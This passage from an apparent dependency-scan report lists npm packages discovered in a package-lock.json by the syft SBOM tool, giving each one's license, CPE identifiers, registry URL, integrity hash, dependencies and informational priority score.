cpe:2.3:a:browserify:browserify_zlib:0.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/browserify-zlib@0.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/browserify-zlib/-/browserify-zlib-0.2.0.tgz integrity: sha512-Z942RysHXmJrhqk88FmKBVq/v5tqmSkDz7p54G/MGyjMnCFFnC79XWNbg+Vta8W6Wb2qtSZTSxIGkJrRpCFEiA== dependencies: pako: ~1.0.5 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 27d8113ce8ad07e6 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: browserslist 4.28.2' title: browserslist 4.28.2 description: 'Package discovered: browserslist 4.28.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4688a05ee871df84 name: browserslist version: 4.28.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:browserslist_project:browserslist:4.28.2:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/browserslist@4.28.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/browserslist/-/browserslist-4.28.2.tgz integrity: sha512-48xSriZYYg+8qXna9kwqjIVzuQxi+KYWp2+5nCYnYKPTr0LvD89Jqk2Or5ogxz0NUMfIjhh2lIUX/LyX9B4oIg== dependencies: baseline-browser-mapping: ^2.10.12 caniuse-lite: ^1.0.30001782 electron-to-chromium: ^1.5.328 node-releases: ^2.0.36 update-browserslist-db: ^1.2.3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4b1e259ceb7e99ec ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: buffer-equal-constant-time 1.0.1' title: buffer-equal-constant-time 1.0.1 description: 'Package discovered: buffer-equal-constant-time 1.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ea42e35a908d5ccd name: buffer-equal-constant-time version: 1.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:buffer-equal-constant-time:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer-equal-constant-time:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer_equal_constant_time:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer_equal_constant_time:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer-equal-constant:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer-equal-constant:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer_equal_constant:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer_equal_constant:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer-equal:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer-equal:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer_equal:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer_equal:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/buffer-equal-constant-time@1.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/buffer-equal-constant-time/-/buffer-equal-constant-time-1.0.1.tgz integrity: sha512-zRpUiDwd/xk6ADqPMATG8vc9VPrkck7T07OIx0gnjmJAnHnTVXNQG3vfvWNuiZIkwu9KrKdA1iJKfsfTVxE6NA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 991f80bfd3038fd0 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: buffer-from 1.1.2' title: buffer-from 1.1.2 description: 'Package discovered: buffer-from 1.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 98e22d90241a7628 name: buffer-from version: 1.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:buffer-from:buffer-from:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer-from:buffer_from:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer_from:buffer-from:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer_from:buffer_from:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer:buffer-from:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:buffer:buffer_from:1.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/buffer-from@1.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz integrity: sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e092abe833e5a95d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: busboy 1.6.0' title: busboy 1.6.0 description: 'Package discovered: busboy 1.6.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3009b8237fb85cf0 name: busboy version: 1.6.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:busboy:busboy:1.6.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/busboy@1.6.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/busboy/-/busboy-1.6.0.tgz integrity: sha512-8SFQbg/0hQ9xy3UNTB0YEnsNBbWfhf7RtnzpL7TkBiTBRfrQ9Fxcnz7VJsleJpyp6rVLvXiuORqjlHi5q+PYuA== dependencies: streamsearch: ^1.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 81eb78c52edce0ec ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: bytes 3.1.2' title: bytes 3.1.2 description: 'Package discovered: bytes 3.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f9a24c0655f5cc44 name: bytes version: 3.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:bytes:bytes:3.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/bytes@3.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz integrity: sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a35927eb13a2081e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: call-bind-apply-helpers 1.0.2' title: call-bind-apply-helpers 1.0.2 description: 'Package discovered: call-bind-apply-helpers 1.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2303cf02934afa6a name: call-bind-apply-helpers version: 1.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:call-bind-apply-helpers:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call-bind-apply-helpers:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call_bind_apply_helpers:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call_bind_apply_helpers:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call-bind-apply:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call-bind-apply:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call_bind_apply:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call_bind_apply:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call-bind:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call-bind:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call_bind:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call_bind:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/call-bind-apply-helpers@1.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz integrity: sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ== dependencies: es-errors: ^1.3.0 function-bind: ^1.1.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4e5277c95313e881 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: call-bound 1.0.4' title: call-bound 1.0.4 description: 'Package discovered: call-bound 1.0.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 23c8e695a4ffce79 name: call-bound version: 1.0.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:call-bound:call-bound:1.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call-bound:call_bound:1.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call_bound:call-bound:1.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call_bound:call_bound:1.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call:call-bound:1.0.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:call:call_bound:1.0.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/call-bound@1.0.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/call-bound/-/call-bound-1.0.4.tgz integrity: sha512-+ys997U96po4Kx/ABpBCqhA9EuxJaQWDQg7295H4hBphv3IZg0boBKuwYpt4YXp6MZ5AmZQnU/tyMTlRpaSejg== dependencies: call-bind-apply-helpers: ^1.0.2 get-intrinsic: ^1.3.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a4cb8d0a4eb7503f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: camelcase 5.3.1' title: camelcase 5.3.1 description: 'Package discovered: camelcase 5.3.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 98453e2c1718f20f name: camelcase version: 5.3.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:camelcase:camelcase:5.3.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/camelcase@5.3.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz integrity: sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3b9efee290bbc139 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: camelcase-css 2.0.1' title: camelcase-css 2.0.1 description: 'Package discovered: camelcase-css 2.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b224930ed183bceb name: camelcase-css version: 2.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:camelcase-css:camelcase-css:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:camelcase-css:camelcase_css:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:camelcase_css:camelcase-css:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:camelcase_css:camelcase_css:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:camelcase:camelcase-css:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:camelcase:camelcase_css:2.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/camelcase-css@2.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/camelcase-css/-/camelcase-css-2.0.1.tgz integrity: sha512-QOSvevhslijgYwRx6Rv7zKdMF8lbRmx+uQGx2+vDc+KI/eBnsy9kit5aj23AgGu3pa4t9AgwbnXWqS+iOY+2aA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 54ace4d8b29c3fad ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: caniuse-lite 1.0.30001791' title: caniuse-lite 1.0.30001791 description: 'Package discovered: caniuse-lite 1.0.30001791' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 574728aff770dffd name: caniuse-lite version: 1.0.30001791 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: CC-BY-4.0 spdxExpression: CC-BY-4.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:caniuse-lite:caniuse-lite:1.0.30001791:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:caniuse-lite:caniuse_lite:1.0.30001791:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:caniuse_lite:caniuse-lite:1.0.30001791:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:caniuse_lite:caniuse_lite:1.0.30001791:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:caniuse:caniuse-lite:1.0.30001791:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:caniuse:caniuse_lite:1.0.30001791:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/caniuse-lite@1.0.30001791 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001791.tgz integrity: sha512-yk0l/YSrOnFZk3UROpDLQD9+kC1l4meK/wed583AXrzoarMGJcbRi2Q4RaUYbKxYAsZ8sWmaSa/DsLmdBeI1vQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d2ccf1883f8178ec ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: chokidar 3.6.0' title: chokidar 3.6.0 description: 'Package discovered: chokidar 3.6.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e6e064efe5c17d2c name: chokidar version: 3.6.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:chokidar:chokidar:3.6.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/chokidar@3.6.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/chokidar/-/chokidar-3.6.0.tgz integrity: sha512-7VT13fmjotKpGipCW9JEQAusEPE+Ei8nl6/g4FBAmIm0GOOLMua9NDDo/DWp0ZAxCr3cPq5ZpBqmPAQgDda2Pw== dependencies: anymatch: ~3.1.2 braces: ~3.0.2 glob-parent: ~5.1.2 is-binary-path: ~2.1.0 is-glob: ~4.0.1 normalize-path: ~3.0.0 readdirp: ~3.6.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 265715c369a6ec46 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: client-only 0.0.1' title: client-only 0.0.1 description: 'Package discovered: client-only 0.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e7be86c370ee2217 name: client-only version: 0.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:client-only:client-only:0.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:client-only:client_only:0.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:client_only:client-only:0.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:client_only:client_only:0.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:client:client-only:0.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:client:client_only:0.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/client-only@0.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/client-only/-/client-only-0.0.1.tgz integrity: sha512-IV3Ou0jSMzZrd3pZ48nLkT9DA7Ag1pnPzaiQhpW7c3RbcqqzvzzVu+L8gfqMp/8IM2MQtSiqaCxrrcfu8I8rMA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c077917c166ed35e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: cliui 6.0.0' title: cliui 6.0.0 description: 'Package discovered: cliui 6.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0b1fbe7259e117a1 name: cliui version: 6.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:cliui:cliui:6.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/cliui@6.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/cliui/-/cliui-6.0.0.tgz integrity: sha512-t6wbgtoCXvAzst7QgXxJYqPt0usEfbgQdftEPbLL/cvv6HPE5VgvqCuAIDR0NgU52ds6rFwqrgakNLrHEjCbrQ== dependencies: string-width: ^4.2.0 strip-ansi: ^6.0.0 wrap-ansi: ^6.2.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b756cde7127582a3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: cliui 8.0.1' title: cliui 8.0.1 description: 'Package discovered: cliui 8.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6699f516cd09331f name: cliui version: 8.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:cliui:cliui:8.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/cliui@8.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz integrity: sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ== dependencies: string-width: ^4.2.0 strip-ansi: ^6.0.1 wrap-ansi: ^7.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6102e65c9c7e3be7 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: clone 2.1.2' title: clone 2.1.2 description: 'Package discovered: clone 2.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 924490c8cb0d8bef name: clone version: 2.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:clone:clone:2.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/clone@2.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/clone/-/clone-2.1.2.tgz integrity: sha512-3Pe/CF1Nn94hyhIYpjtiLhdCoEoz0DqQ+988E9gmeEdQZlojxnOb74wctFyuwWQHzqyf9X7C7MG8juUpqBJT8w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: de7fc275efead359 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: clsx 2.1.1' title: clsx 2.1.1 description: 'Package discovered: clsx 2.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 1cdd74d474651cd1 name: clsx version: 2.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:clsx:clsx:2.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/clsx@2.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/clsx/-/clsx-2.1.1.tgz integrity: sha512-eYm0QWBtUrBWZWG0d386OGAw16Z995PiOVo2B7bjWSbHedGl5e0ZWaq65kOGgUSNesEIDkB9ISbTg/JK9dhCZA== dependencies: null compliance: cisControlsV8_1: 